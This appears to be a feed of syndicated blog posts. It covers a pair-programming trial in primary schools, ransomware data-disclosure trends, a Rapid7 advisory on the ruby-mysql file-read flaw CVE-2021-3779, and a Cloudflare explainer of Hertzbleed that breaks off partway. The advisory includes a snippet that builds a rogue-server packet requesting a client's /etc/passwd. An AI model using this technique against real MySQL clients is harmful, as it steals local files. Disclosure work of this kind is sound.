As with the healthcare and pharmaceutical sectors, our data showed some interesting and unique motivations from threat actors, as well as confirmed some suspicions we already had about why they choose the data they choose to disclose. Next time, we’ll be taking a look at some of the threat actors themselves and the ways they’ve impacted the overall ransomware “market” over the last two years.


A pair programming approach for engaging girls in the Computing classroom: Study results

Post Syndicated from Katharine Childs original https://www.raspberrypi.org/blog/gender-balance-in-computing-pair-programming-approach-engaging-girls/

Today we share the second report in our series of findings from the Gender Balance in Computing research programme, which we’ve been running as part of the National Centre for Computing Education and with various partners. In this £2.4 million research programme, funded by the Department for Education in England, we aim to identify ways to encourage more female learners to engage with Computing and choose to study it further.

A teacher encourages a learner in the computing classroom.

Previously, we shared the evaluation report about our pilot study of using a storytelling approach with very young computing learners. This new report, again coming from the Behavioural Insights Team (BIT) which acts as the programme’s independent evaluator, describes our study of another teaching approach.

Existing research suggests that computing is not always taught in a way that is engaging for girls in particular [1], and that we can improve this. With the intervention at hand, we wanted to explore the effects of using a pair programming teaching approach with primary school learners aged 8 to 11. We have critically and carefully examined the findings, which show mixed outcomes regarding the effectiveness of the approach, and we believe that the research provides insights that increase our shared understanding of how to teach computing effectively to young learners. 

Computing education through a collaborative lens

Many people think that writing computer programs is a task carried out by people working individually. A 2017 study of 8- and 9-year-olds [2] confirms this: when asked to draw a picture of a computer scientist doing work, 90% of the children drew a picture of one person working alone. This stereotype is present in teaching and learning about computing and computer science; many computer programming lessons take place in a way that promotes solitary working, with individual students sitting in front of separate computers, working on their own code and debugging their own errors.

A girl codes at a laptop while a woman looks on during a Code Club session.

Professional software development rarely happens like this. For example, at the Raspberry Pi Foundation, our software engineers work collaboratively on design and often pair up to solve problems. Computing education research also has identified the importance of looking at computer programming through a collaborative lens. This viewpoint allows us to see computing as a subject with scope for collaborative group work in which students create useful applications together and are part of a community where programming has a shared social context [3]. 

Researching collaborative learning in the primary computing classroom 

One teaching approach in computing that promotes collaborative learning is pair programming (a practice also used in industry). This is a structured way of working on programming tasks  where learners are paired up and take turns acting as the driver or the navigator. The driver controls the keyboard and mouse and types the code. The navigator reads the instructions, supports the driver by watching out for errors in the code, and thinks strategically about next steps and solutions to problems. Learners swap roles every 5 to 10 minutes, to ensure that both partners can contribute equally and actively to the collaborative learning.

Two female learners code at a computer together.

As one part of the Gender Balance in Computing programme, we designed a project to explore the effect of pair programming on girls’ attitudes towards computing. This project builds on research from the USA which suggests that solving problems collaboratively increases girls’ persistence when they encounter difficulties in programming tasks [4].

In the Pair Programming project, we worked with teachers of Year 4 (ages 8–9) and Year 6 (ages 10–11) in schools in England. From January to March 2020, we ran a pilot study with 10 schools and used the resulting teacher feedback to finalise the training and teaching materials for a full randomised controlled trial. Due to the coronavirus pandemic, we trained teachers in the pair programming approach using an online course instead of face-to-face training.

A tweet from a school about taking part in the pair programming study.

The randomised controlled trial ran from September to December 2021 with 97 schools. Schools were randomly allocated either to the intervention group, which used the pair programming training and the scheme of work we designed, or to the control group, which taught Computing in its usual way, unaware that we were investigating the effects of pair programming.

Teachers in both groups delivered 12 weeks of Computing lessons, in which learners used Scratch programming to draw shapes and create animations. The lessons covered computing concepts from Key Stage 2 (ages 7–11), such as using sequences, selection, and repetition in programs, as well as digital literacy skills such as using technology respectfully.

What can we learn about pair programming from the study? 

The findings about this particular intervention were limited by the amount of data the independent evaluators at BIT were able to collect amongst learners and teachers given the ongoing pandemic. BIT’s evaluation was primarily based on quantitative data collected from learners at the start and the end of the intervention. To collect the data, they used a validated instrument called the Student Computer Science Attitude Survey (SCSAS), which asks learners about their attitudes towards Computing. The evaluators compared the datasets gathered from the intervention group (who took part in pair programming lessons) and the control group (who took part in Computing lessons taught with a ‘business as usual’ model).

A teacher watches two female learners code in Code Club session in the classroom.

The evaluators’ data analysis found no statistically significant evidence that the pair programming approach positively affected girls’ attitudes towards computing or their intention to study computing in the future. The lack of statistically significant results, called a null result in research projects, can appear disappointing at first. But our work involves careful reflection and critical thinking about all outcomes of our research, and the result of this project is no exception. These are factors that may have contributed towards the result: 

  • The independent evaluators suggested that the intervention may lead to different findings if it were implemented again without the disruptions caused by the pandemic. One of their recommendations was to revert to our original planned model of providing face-to-face training to teachers delivering the pair programming approach, and we believe this would embed a deeper understanding of the approach. 
  • Our research built upon a prior study [4] that suggested a connection between pair programming and increased confidence about problem-solving in girls of a similar age. That study took place in a non-formal setting in an all-girls group, whereas our research was situated in formal education in mixed gender groups. It may be that these differences are significant. 
  • It may be that there is no causal link between using the pair programming approach and an increase in girls’ attitudes towards computing, or that the link may only become apparent over a longer time-scale, or that the pair programming approach needs to be combined with other strategies to achieve a positive effect. 

The evaluators also gathered qualitative data by running teacher and learner interviews, and we were pleased that this data provided some rich insights into the benefits of using a pair programming approach in the primary classroom, and gave some promising indications of possible benefits for female learners in particular. 

  1. Teachers spoke positively about the use of paired activities, and felt that having the defined roles of driver and navigator helped both partners to contribute equally to the programming tasks. Learners said that they enjoyed working in pairs, even though there could be some moments of frustration. Some of the teachers were even planning to integrate pair programming into future lessons. This suggests that the approach was effective both in engaging and motivating learners, as well as in facilitating the planned learning outcomes of the lessons,  and that it can be used more widely in primary computing teaching.

“I don’t know why I’ve never thought to do computing like that, actually, because it’s a really good vehicle for the fact that there are two roles, clearly defined. There’s all your conversation, and knowledge comes through that, and then they’re both equally having a turn.” — Primary school teacher (report, p. 38)

“I like working with both [both as a partner and by yourself] because when you do pair programming, you’re collaborating with your partner, making links, and you have to tell them what to do. But if you have a really good idea and then they put the wrong thing in the wrong place, it’s quite annoying.” — Female learner (report, p. 40)

  2. Both teachers and learners felt that having the support of a partner boosted learners’ confidence, which echoes previous research in the field [5, 6]. In computing, boys more accurately assess their capabilities, whereas girls tend to underestimate their performance [7]. When learners feel a positive emotion such as confidence towards a subject, combined with a belief that they can succeed in tasks related to that subject, this shows self-efficacy [8]. Our findings suggest that, through the use of the pair programming approach, both boys and girls improved their sense of self-efficacy towards Computing, which is corroborated by quotes from learners themselves. This is interesting because a sense of self-efficacy in Computing is linked to the decisions to pursue further study in the subject [9]. More research could build on this observation.

“I do think that having that equal time to have a go at both, thinking of the girls I’ve got, will have helped my girls, because they lack a bit of confidence. They were learning very quickly that, ‘Actually, yes, we are sure. We can do this.’” — Primary teacher (report, p. 44)

“It might be easier to do pair programming [compared to ‘normal’ lessons] because if you’re stuck, your partner can be helpful.” — Female learner (report, p. 43)

Find out more about pair programming 

  • Download our Big Book of Computing Pedagogy as a free PDF and read about pair programming on pages 58 and 59.
  • Watch this short video that shows pair programming being used in a primary classroom. 
  • Read the evaluation report of the pair programming intervention, where you’ll also find more quotes from teachers and learners.
  • Try the free training course on pair programming we designed and used for this project. It also includes links to the lesson plans that teachers worked with. 

Collaboration in our research

We will continue to publish evaluation reports and our reflections on the other projects in the Gender Balance in Computing programme. If you would like to stay up-to-date with the programme, you can sign up to the newsletter.

Two learners at a desktop computer doing coding.

The insights gained from this trial will feed forwards into our future work. Through the process of working with schools on this project, we have increased our understanding of the process of research in educational settings in many ways. We are very grateful for the input from teachers who took part in the first stage of the trial, with whom we developed an effective co-production model for developing resources, a model we will use in future research projects. Teachers who took part in the second stage of the project told us that the resources we provided were of good quality, which demonstrates the success of this co-production approach to developing resources. 

In our new Raspberry Pi Computing Education Research Centre, created with the University of Cambridge Department of Computer Science and Technology, we will collaborate closely with teachers and schools when implementing and evaluating research projects. You are invited to the free in-person launch event of the Centre on 20 July in Cambridge, UK, where we hope to meet many teachers, researchers, and other education practitioners to strengthen a collaborative community around computing education research.

References

[1] Goode, J., Estrella, R., & Margolis, J. (2018). Lost in Translation: Gender and High School Computer Science. In Women and Information Technology. https://doi.org/10.7551/mitpress/7272.003.0005

[2] Alexandria K. Hansen, Hilary A. Dwyer, Ashley Iveland, Mia Talesfore, Lacy Wright, Danielle B. Harlow, and Diana Franklin. 2017. Assessing Children’s Understanding of the Work of Computer Scientists: The Draw-a-Computer-Scientist Test. In Proceedings of the 2017 ACM SIGCSE Technical Symposium on Computer Science Education (SIGCSE ’17). Association for Computing Machinery, New York, NY, USA, 279–284. https://doi.org/10.1145/3017680.3017769

[3] Yasmin B. Kafai and Quinn Burke. 2013. The social turn in K-12 programming: moving from computational thinking to computational participation. In Proceeding of the 44th ACM technical symposium on Computer science education (SIGCSE ’13). Association for Computing Machinery, New York, NY, USA, 603–608. https://doi.org/10.1145/2445196.2445373

[4] Linda Werner & Jill Denning (2009) Pair Programming in Middle School, Journal of Research on Technology in Education, 42:1, 29-49. https://doi.org/10.1080/15391523.2009.10782540

[5] Charlie McDowell, Linda Werner, Heather E. Bullock, and Julian Fernald. 2006. Pair programming improves student retention, confidence, and program quality. Commun. ACM 49, 8 (August 2006), 90–95. https://doi.org/10.1145/1145287.1145293

[6] Denner, J., Werner, L., Campe, S., & Ortiz, E. (2014). Pair programming: Under what conditions is it advantageous for middle school students? Journal of Research on Technology in Education, 46(3), 277–296. https://doi.org/10.1080/15391523.2014.888272

[7] Maria Kallia and Sue Sentance. 2018. Are boys more confident than girls? the role of calibration and students’ self-efficacy in programming tasks and computer science. In Proceedings of the 13th Workshop in Primary and Secondary Computing Education (WiPSCE ’18). Association for Computing Machinery, New York, NY, USA, Article 16, 1–4. https://doi.org/10.1145/3265757.3265773

[8] Bandura, A. (1977). Self-efficacy: Toward a unifying theory of behavioral change. Psychological Review, 84(2), 191–215. https://doi.org/10.1037/0033-295X.84.2.191

[9] Allison Mishkin. 2019. Applying Self-Determination Theory towards Motivating Young Women in Computer Science. In Proceedings of the 50th ACM Technical Symposium on Computer Science Education (SIGCSE ’19). Association for Computing Machinery, New York, NY, USA, 1025–1031. https://doi.org/10.1145/3287324.3287389


For Ransomware Double-Extorters, It’s All About the Benjamins — and Data From Healthcare and Pharma

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/28/for-ransomware-double-extorters-its-all-about-the-benjamins-and-data-from-healthcare-and-pharma/

Welcome to the second installment in our series looking at the latest ransomware research from Rapid7. Two weeks ago, we launched “Pain Points: Ransomware Data Disclosure Trends”, our first-of-its-kind look into the practice of double extortion, what kinds of data get disclosed, and how the ransomware “market” has shifted in the two years since double extortion became a particularly nasty evolution to the practice.

Today, we’re going to talk a little more about the healthcare and pharmaceutical industry data and analysis from the report, highlighting how these two industries differ from some of the other hardest-hit industries and how they relate to each other (or don’t in some cases).

But first, let’s recap what “Pain Points” is actually analyzing. Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats and operationalizes that data automatically with our Threat Command product. This means we have at our disposal large amounts of data pertaining to ransomware double extortion that we were able to analyze to determine some interesting trends like never before. Check out the full paper for more detail, and view some well redacted real-world examples of data breaches while you’re at it.

For healthcare and pharma, the risks are heightened

When it comes to the healthcare and pharmaceutical industries, there are some notable similarities that set them apart from other verticals. For instance, internal finance and accounting files showed up more often in initial ransomware data disclosures for healthcare and pharma than for any other industry (71%), including financial services (where you would think financial information would be the most common).

After that, customer and patient data showed up in more than 58% of disclosures — still very high, indicating that ransomware attackers particularly value this data from these industries. This is likely due to the relative amount of damage (legal and regulatory) these kinds of disclosures could inflict on such a highly regulated field (particularly healthcare).

All eyes on IP and patient data

Where the healthcare and pharmaceutical industries differed was in the prevalence of intellectual property (IP) disclosures. The healthcare industry focuses mostly on patients, so it makes sense that one of its biggest data disclosure areas would be personal information. But the pharma industry focuses much more on research and development than it does on the personal information of people. IP showed up in 43% of all pharma-related disclosures. Again, the predilection on the part of ransomware attackers to “hit ’em where it hurts the most” is on full display here.

Finally, different ransomware groups favor different types of data disclosures, as our data indicated. REvil and Cl0p were the only groups to disclose intellectual property from healthcare and pharma victims (in 10% and 20% of their disclosures, respectively). For customer and patient data, REvil took the top spot with 55% of disclosures, with Darkside behind them at 50%. Conti and Cl0p followed with 42% and 40%, respectively.

So there you have it: When it comes to the healthcare and pharmaceutical industries, financial data, customer data, and intellectual property are the most frequently used data to impose double extortion on ransomware victims.

Ready to dive further into the data? Check out the full report.


CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/06/28/cve-2021-3779-ruby-mysql-gem-client-file-read-fixed/

The ruby-mysql Ruby gem prior to version 2.10.0 maintained by Tomita Masahiro is vulnerable to an instance of CWE-610: Externally Controlled Reference to a Resource in Another Sphere, wherein a malicious MySQL server can request local file content from a client without explicit authorization from the user. The initial CVSSv3 estimate for this issue is 6.5. Note that this issue does not affect the much more popular mysql2 gem. This issue was fixed in ruby-mysql 2.10.0 on October 23, 2021, and users of ruby-mysql are urged to update.

Product description

The ruby-mysql Ruby gem is an implementation of a MySQL client. While it is far less popular than the mysql2 gem, it serves a particular niche audience of users that desire a pure Ruby implementation of MySQL client functionality without linking to an external library (as mysql2 does).

Credit

This issue was reported to Rapid7 by Hans-Martin Münch of MOGWAI LABS GmbH, initially as a Metasploit issue, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy after coordination with the upstream maintainer of this library, as well as JPCERT/CC and CERT/CC.

Exploitation

A malicious actor can read arbitrary files from a client that uses ruby-mysql to communicate with a rogue MySQL server and issue database queries. In these cases, the server has the option to reply to a query with a LOAD DATA LOCAL file-transfer request, which instructs the client to provide additional data from a local file readable by the client (and not a “local” file on the server). The easiest way to demonstrate this issue is to run an instance of Rogue-MySql-Server by Gifts and perform any database query using a vulnerable version of the ruby-mysql gem.
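
To make the mechanics concrete, here is a minimal sketch (in Python, purely for illustration) of the packet a rogue server sends in reply to a query. The wire format is from the MySQL protocol: a response payload beginning with the 0xFB marker is a LOCAL INFILE request, and the rest of the payload names the file the client should read and send back.

# Minimal sketch of the MySQL LOCAL INFILE request packet a rogue server
# (such as Rogue-MySql-Server) can send in reply to any query.
# Framing: 3-byte little-endian payload length, then a 1-byte sequence number.
def local_infile_request(filename: str, seq: int = 1) -> bytes:
    payload = b"\xfb" + filename.encode()  # 0xFB marks a LOCAL INFILE request
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload

# A vulnerable client answers this packet with the contents of the named file.
print(local_infile_request("/etc/passwd").hex())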

Note that this behavior is a defined and expected option for servers and is described in the documentation, quoted below:

Because LOAD DATA LOCAL is an SQL statement, parsing occurs on the server side, and transfer of the file from the client host to the server host is initiated by the MySQL server, which tells the client the file named in the statement. In theory, a patched server could tell the client program to transfer a file of the server’s choosing rather than the file named in the statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.) [emphasis added]

So, the vulnerability is not so much a MySQL server or protocol issue as it is a client issue: a client should, at a minimum, provide an option to disable LOAD DATA LOCAL queries, and version 2.9.14 and earlier versions of ruby-mysql provide no such option.

There is also prior work on this type of issue, and interested readers should refer to the Knownsec 404 Team’s article describing the issue for a thorough understanding of the dangers of LOAD DATA LOCAL and untrusted MySQL servers.

Impact

As stated, this issue only affects Ruby-based MySQL clients that connect to malicious MySQL servers. The vast majority of clients already know who they’re connecting to, and while an attacker could poison DNS records or otherwise intercede in network traffic to capture unwitting clients, such network shenanigans will be foiled by routine security controls like SSL certificates. The true risk is posed only to those people who connect to random and unknown MySQL servers in unfamiliar environments.

In other words, penetration testers and other opportunistic MySQL attackers are most at risk from this kind of vulnerability. CVE-2021-3779 fits squarely in the category of “hacking the hackers,” where an aggressive honeypot is designed to lie in wait for wandering MySQL scanners and attackers and steal data local to those connecting clients.

This is the reason why Hans-Martin Münch of MOGWAI LABS GmbH first brought this to Rapid7’s attention as an issue in Metasploit. While Metasploit users are indeed the most at risk of falling victim to an exploit for this vulnerability, the underlying issue was quickly identified as one in the shared open-source library code that Metasploit depends on for managing MySQL connections to remote servers. (One such example is the MySQL hashdump auxiliary module.)

Remediation

Users who implement ruby-mysql should update to version 2.10.0 or later, where this issue is fixed. The current version (as of this writing) is 3.0.0, released in November 2021.

Users unable to update can patch around the issue by ensuring that CLIENT_LOCAL_FILES is disallowed by the client, similarly to how Metasploit Framework initially remediated this issue while waiting on a fix from the upstream maintainer.
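
Conceptually, that client-side fix amounts to never advertising the CLIENT_LOCAL_FILES capability during the handshake. A minimal sketch of the capability masking, with the flag value taken from the MySQL protocol:

# CLIENT_LOCAL_FILES is bit 0x80 of the client capability flags sent in the
# MySQL handshake. Clearing it tells the server that LOAD DATA LOCAL is
# unsupported, so a well-behaved server will not request client files.
CLIENT_LOCAL_FILES = 0x0080

def harden_capabilities(flags: int) -> int:
    return flags & ~CLIENT_LOCAL_FILES

Since a malicious server can simply ignore the advertised capabilities, a hardened client should also treat any unsolicited 0xFB (LOCAL INFILE request) reply as a protocol error rather than answering it.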

Disclosure timeline

The astute reader will note a significant gap of several months between the fix release and this disclosure. This was a failure on my, Tod Beardsley’s, part, since I was handling this issue.

For the record, there was no intention to bury this vulnerability. After all, we communicated it to Tomita (the maintainer), RubyGems (who pointed us in the direction of Rubysec, thanks André), CERT/CC, and JPCERT/CC, so hopefully the intention to disclose in a timely manner was and is obvious.

But a confluence of family tragedies and home-office technical disasters conspired with the usual complications of a multi-stakeholder, multi-continent effort to coordinate disclosure in open-source library code.

I am also acutely aware of the irony of this delay in light of my recent post on silent patches, and I offer apologies for that delay. I am committed to being better with backups, both of the data and human varieties.

Note that all dates are local to the United States (some dates may differ in Japan and Germany depending on the time of day).

  • August, 2021: Issue discovered by Hans-Martin Münch of MOGWAI LABS GmbH.
  • Thu, Sep 2, 2021: Issue reported to Rapid7’s security contact as a Metasploit issue, #9286.
  • Tue, Sep 7, 2021: Rapid7 validated the issue, reserved CVE-2021-3779, and contacted the vulnerable gem maintainer, Tomita Masahiro.
  • Wed, Sep 8, 2021: Metasploit Framework temporary remediation committed.
  • Wed, Sep 8, 2021: Notified CERT/CC and RubyGems for disclosure coordination, as the gem appeared to be abandoned by the maintainer given no updates in several years.
  • Thu, Sep 9, 2021: Notified JPCERT/CC through VINCE on CERT/CC’s advice, as VU#541053.
  • Fri, Sep 10, 2021: JPCERT/CC acknowledged the issue and attempted to contact the gem maintainer.
  • Mon, Oct 18, 2021: Maintainer responded to JPCERT/CC, acknowledging the issue.
  • Fri, Oct 22, 2021: Fixed version 2.10.0 released, Rapid7 notified Hans-Martin of the fix.
  • Wed, Feb 16, 2022: CERT/CC asks for an update on the issue, Rapid7 communicates the fix to CERT/CC and JPCERT/CC.
  • Mon, Jun 6, 2022: CERT/CC asks for an update, Rapid7 commits to sharing disclosure documentation.
  • Tue, Jun 14, 2022: Rapid7 shares disclosure details with CERT/CC and Hans-Martin, and asks JPCERT/CC to communicate this document to Tomita.
  • Tue, Jun 28, 2022: This public disclosure.


Hertzbleed explained

Post Syndicated from Yingchen Wang original https://blog.cloudflare.com/hertzbleed-explained/

Hertzbleed explained

Hertzbleed explained

You may have heard a bit about the Hertzbleed attack that was recently disclosed. Fortunately, one of the student researchers who was part of the team that discovered this vulnerability and developed the attack is spending this summer with Cloudflare Research and can help us understand it better.

The first thing to note is that Hertzbleed is a new type of side-channel attack that relies on changes in CPU frequency. Hertzbleed is a real and practical threat to the security of cryptographic software.

Should I be worried?

From the Hertzbleed website,

“If you are an ordinary user and not a cryptography engineer, probably not: you don’t need to apply a patch or change any configurations right now. If you are a cryptography engineer, read on. Also, if you are running a SIKE decapsulation server, make sure to deploy the mitigation described below.”

Notice: As of today, there is no known attack that uses Hertzbleed to target conventional and standardized cryptography, such as the encryption used in Cloudflare products and services. Having said that, let’s get into the details of processor frequency scaling to understand the core of this vulnerability.

In short, the Hertzbleed attack shows that, under certain circumstances, dynamic voltage and frequency scaling (DVFS), a power management scheme of modern x86 processors, depends on the data being processed. This means that on modern processors, the same program can run at different CPU frequencies (and therefore take different wall-clock times). For example, we expect that a CPU takes the same amount of time to perform the following two operations because it uses the same algorithm for both. However, there is an observable time difference between them:

[Figure: two addition operations on different inputs]

Trivia: Could you guess which operation runs faster?

Before giving the answer, we will explain some details about how Hertzbleed works and its impact on SIKE, a new cryptographic algorithm designed to remain secure even against adversaries equipped with quantum computers.

Frequency Scaling

Suppose a runner is in a long distance race. To optimize the performance, the heart monitors the body all the time. Depending on the input (such as distance or oxygen absorption), it releases the appropriate hormones that will accelerate or slow down the heart rate, and as a result tells the runner to speed up or slow down a little. Just like the heart of a runner, DVFS (dynamic voltage and frequency scaling) is a monitor system for the CPU. It helps the CPU to run at its best under present conditions without being overloaded.


Just as a runner’s heart causes her pace to fluctuate throughout a race depending on the level of exertion, DVFS adjusts the CPU’s frequency around the so-called steady-state frequency when the CPU is running a sustained workload. It causes the CPU to switch among multiple performance levels (called P-states) and oscillate among them. Modern DVFS gives the hardware almost full control over which P-states to execute in and how long to stay in any P-state. These modifications are largely opaque to the user: they are controlled by hardware, and the operating system provides limited visibility and control to the end user.

The ACPI specification defines the P0 state as the state in which the CPU runs at its maximum performance capability. Moving to higher-numbered P-states makes the CPU less performant in favor of consuming less energy and power.

[Figure: Suppose a CPU’s steady-state frequency is 4.0 GHz. Under DVFS, the frequency can oscillate between 3.9 and 4.1 GHz.]
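
On Linux, you can watch these oscillations yourself. A small sketch, assuming a machine that exposes the cpufreq sysfs interface (run a busy workload in another terminal to see the frequency move):

import time

# Current frequency of CPU 0 in kHz, as exposed by the cpufreq subsystem.
PATH = "/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq"

for _ in range(10):
    with open(PATH) as f:
        khz = int(f.read())
    print(f"{khz / 1e6:.2f} GHz")
    time.sleep(0.1)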

How long does the CPU stay at each P-state? Most importantly, how can this even lead to a vulnerability? Excellent questions!

Modern DVFS is designed this way because CPUs have a Thermal Design Point (TDP), indicating the expected power consumption at steady state under a sustained workload. For a typical desktop processor, such as a Core i7-8700, the TDP is 65 W.

To continue our human running analogy: a typical person can sprint only short distances and must run longer distances at a slower pace. When the workload is of short duration, DVFS allows the CPU to enter a high-performance state, called Turbo Boost on Intel processors. In this mode, the CPU can temporarily execute very quickly while consuming much more power than the TDP allows. But when running a sustained workload, the CPU’s average power consumption should stay below the TDP to prevent overheating. For example, as illustrated below, suppose the CPU has been free of any task for a while. When it first starts running the workload, it runs extra hard (Turbo Boost on). After a while, it realizes that this workload is not a short one, so it slows down and enters the steady state. How much does it slow down? That depends on the TDP: when entering the steady state, the CPU runs at a speed at which its power consumption does not exceed the TDP.

[Figure: CPU entering steady state after running at a higher frequency.]

Beyond protecting CPUs from overheating, DVFS also wants to maximize performance. When a runner is in a marathon, she doesn’t run at a fixed pace; rather, her pace floats up and down a little. Remember the P-states we mentioned above? CPUs oscillate between P-states just like runners adjust their pace slightly over time. P-states are CPU frequency levels with discrete increments of 100 MHz.

[Figure: CPU frequency levels with discrete increments.]

The CPU can safely run at a high P-state (low frequency) all the time to stay below TDP, but there might be room between its power consumption and the TDP. To maximize CPU performance, DVFS utilizes this gap by allowing the CPU to oscillate between multiple P-states. The CPU stays at each P-state for only dozens of milliseconds, so that its temporary power consumption might exceed or fall below TDP a little, but its average power consumption is equal to TDP.

To understand this, check out this figure again.

[Figure: CPU frequency oscillating around the 4.0 GHz steady state, repeated from above]

If the CPU only wants to protect itself from overheating, it can safely sit at the 3.9 GHz P-state all the time. However, DVFS wants to maximize CPU performance by utilizing all the available power allowed by the TDP. As a result, the CPU oscillates around the 4.0 GHz P-state; it is never far above or below. When at 4.1 GHz, it overloads itself a little and then drops to a higher-numbered P-state (lower frequency). When at 3.9 GHz, it recovers and quickly climbs back to a lower-numbered P-state (higher frequency). It never stays long in any one P-state, which avoids overheating when at 4.1 GHz and keeps the average power consumption near the TDP.

This is exactly how modern DVFS monitors your CPU to help it optimize power consumption while working hard.

Again, how can DVFS and TDP lead to a vulnerability? We are almost there!

Frequency Scaling vulnerability

The design of DVFS and TDP can be problematic because CPU power consumption is data-dependent! The Hertzbleed paper gives an explicit leakage model of certain operations identifying two cases.

First, the larger the number of bits set (also known as the Hamming weight) in the operands, the more power an operation takes. The Hamming weight effect is widely observed with no known explanation of its root cause. For example,

Hertzbleed explained

The addition on the left will consume more power compared to the one on the right.

Similarly, when registers change their value, there are power variations due to transistor switching. For example, a register switching its value from A to B (as shown on the left) requires flipping only one bit, because the Hamming distance between A and B is 1. Meanwhile, switching from C to D consumes more energy to perform six bit transitions, since the Hamming distance between C and D is 6.

[Figure: Hamming distance between register values]
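
Both quantities in this leakage model are easy to compute. A quick illustration in Python:

def hamming_weight(x: int) -> int:
    """Number of set bits: higher weight tends to mean more power."""
    return bin(x).count("1")

def hamming_distance(a: int, b: int) -> int:
    """Number of differing bits: each flip costs transistor-switching power."""
    return hamming_weight(a ^ b)

print(hamming_distance(0b1000, 0b1001))      # 1 bit flips: cheap
print(hamming_distance(0b101010, 0b010101))  # 6 bits flip: more expensive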

Now we see where the vulnerability is! When running sustained workloads, CPU overall performance is capped by TDP. Under modern DVFS, the CPU maximizes its performance by oscillating between multiple P-states. At the same time, CPU power consumption is data-dependent. Inevitably, workloads with different power consumption will lead to different P-state distributions. For example, if workload w1 consumes less power than workload w2, the CPU will stay longer in a lower P-state (higher frequency) when running w1.

[Figure: Different power consumption leads to different P-state distributions]

As a result, since the power consumption is data-dependent, it follows that CPU frequency adjustments (the distribution of P-states) and execution time (as 1 Hertz = 1 cycle per second) are data-dependent too.

Consider a program that takes five cycles to finish as depicted in the following figure.

[Figure: CPU frequency directly translates to running time.]

As illustrated in the table below, if the program with input 1 runs at 4.0 GHz (red), it takes 1.25 nanoseconds to finish. If the program consumes more power with input 2, under DVFS it will run at a lower frequency, 3.5 GHz (blue), and take more time, 1.43 nanoseconds, to finish. If the program consumes even more power with input 3, under DVFS it will run at an even lower frequency of 3.0 GHz (purple) and now take 1.67 nanoseconds to finish. This program always takes five cycles to finish, but the amount of power it consumes depends on the input. The power influences the CPU frequency, and CPU frequency directly translates to execution time. In the end, the program’s execution time becomes data-dependent.

Execution time of a five-cycle program

Frequency        4.0 GHz    3.5 GHz    3.0 GHz
Execution time   1.25 ns    1.43 ns    1.67 ns
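
The arithmetic behind the table is just cycles divided by frequency, since a 4.0 GHz CPU completes 4 cycles per nanosecond:

CYCLES = 5  # the program always takes five cycles

for ghz in (4.0, 3.5, 3.0):
    # GHz is cycles per nanosecond, so time in ns = cycles / GHz.
    print(f"{ghz:.1f} GHz -> {CYCLES / ghz:.2f} ns")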

To give you another concrete example: Suppose we have a sustained workload Foo. We know that Foo consumes more power with input data 1 and less power with input data 2. As shown on the left in the figure below, if the power consumption of Foo is below the TDP, the CPU frequency, and therefore the running time, stays the same regardless of the choice of input data. However, as shown in the middle, if we add a background stressor to the CPU, the combined power consumption will exceed the TDP. Now we are in trouble. CPU overall performance is monitored by DVFS and capped by TDP. To prevent itself from overheating, the CPU dynamically adjusts its P-state distribution when running workloads with varying power consumption. The P-state distribution of Foo(data 1) will be shifted slightly to the right compared to that of Foo(data 2). As shown on the right, the CPU running Foo(data 1) settles at a lower overall frequency and a longer running time. The observation here is that if data is a binary secret, an attacker can infer data by simply measuring the running time of Foo!

[Figure: Complete recap of Hertzbleed. Figure taken from Intel’s documentation.]

This observation is astonishing because it conflicts with our expectation of a CPU. We expect a CPU to take the same amount of time computing these two additions.

[Figure: the two addition operations from above]

However, Hertzbleed tells us that, just like a person doing math on paper, a CPU not only takes more power to compute more complicated numbers but also spends more time doing so! This is not what a CPU should do while performing a secure computation: anyone who measures the CPU execution time should not be able to infer the data being computed on.

This takeaway of Hertzbleed creates a significant problem for cryptography implementations, because an attacker shouldn’t be able to infer a secret from a program’s running time. When developers implement a cryptographic protocol from a mathematical construction, a common goal is to ensure constant-time execution; that is, code execution does not leak secret information via a timing channel. We have witnessed that timing attacks are practical: notable examples are those shown by Kocher, Brumley-Boneh, Lucky13, and many others. How to properly implement constant-time code is the subject of extensive study.
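
As a reminder of what “constant-time” usually means in practice, compare a naive early-exit comparison with a constant-time one (Python’s hmac.compare_digest). Hertzbleed’s twist is that even code like the second function, which executes the same instruction sequence regardless of the data, can still leak through data-dependent power and, therefore, frequency:

import hmac

def leaky_equals(a: bytes, b: bytes) -> bool:
    # Early exit: running time reveals the position of the first mismatch.
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

def ct_equals(a: bytes, b: bytes) -> bool:
    # Same instruction count no matter where (or whether) the inputs differ.
    return hmac.compare_digest(a, b)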

Historically, our understanding of which operations contribute to time variation did not take DVFS into account. The Hertzbleed vulnerability derives from this oversight: any workload which differs by significant power consumption will also differ in timing. Hertzbleed proposes a new perspective on the development of secure programs: any program vulnerable to power analysis becomes potentially vulnerable to timing analysis!

It is unclear which cryptographic algorithms are vulnerable to Hertzbleed. According to the authors, a systematic study of Hertzbleed is left as future work. However, the authors demonstrated Hertzbleed as a practical vector for attacking SIKE.

Brief description of SIKE

The Supersingular Isogeny Key Encapsulation (SIKE) protocol is a Key Encapsulation Mechanism (KEM) finalist of the NIST Post-Quantum Cryptography competition (currently at Round 3). The building block operation of SIKE is the calculation of isogenies (transformations) between elliptic curves. You can find helpful information about the calculation of isogenies in our previous blog post. In essence, calculating isogenies amounts to evaluating mathematical formulas that take as inputs points on an elliptic curve and produce other different points lying on a different elliptic curve.


SIKE bases its security on the difficulty of computing a relationship between two elliptic curves. On the one hand, it’s easy to compute this relation (called an isogeny) if the points that generate the isogeny (called the kernel of the isogeny) are known in advance. On the other hand, it’s difficult to recover the isogeny given only the two elliptic curves, without knowledge of the kernel points. An attacker has no advantage if the number of possible kernel points to try is large enough to make the search infeasible (computationally intractable), even with the help of a quantum computer.

Similarly to other algorithms based on elliptic curves, such as ECDSA or ECDH, the core of SIKE is calculating operations over points on elliptic curves. As usual, points are represented by a pair of coordinates (x,y) which fulfill the elliptic curve equation

$y^2 = x^3 + Ax^2 + x$

where A is a parameter identifying different elliptic curves.

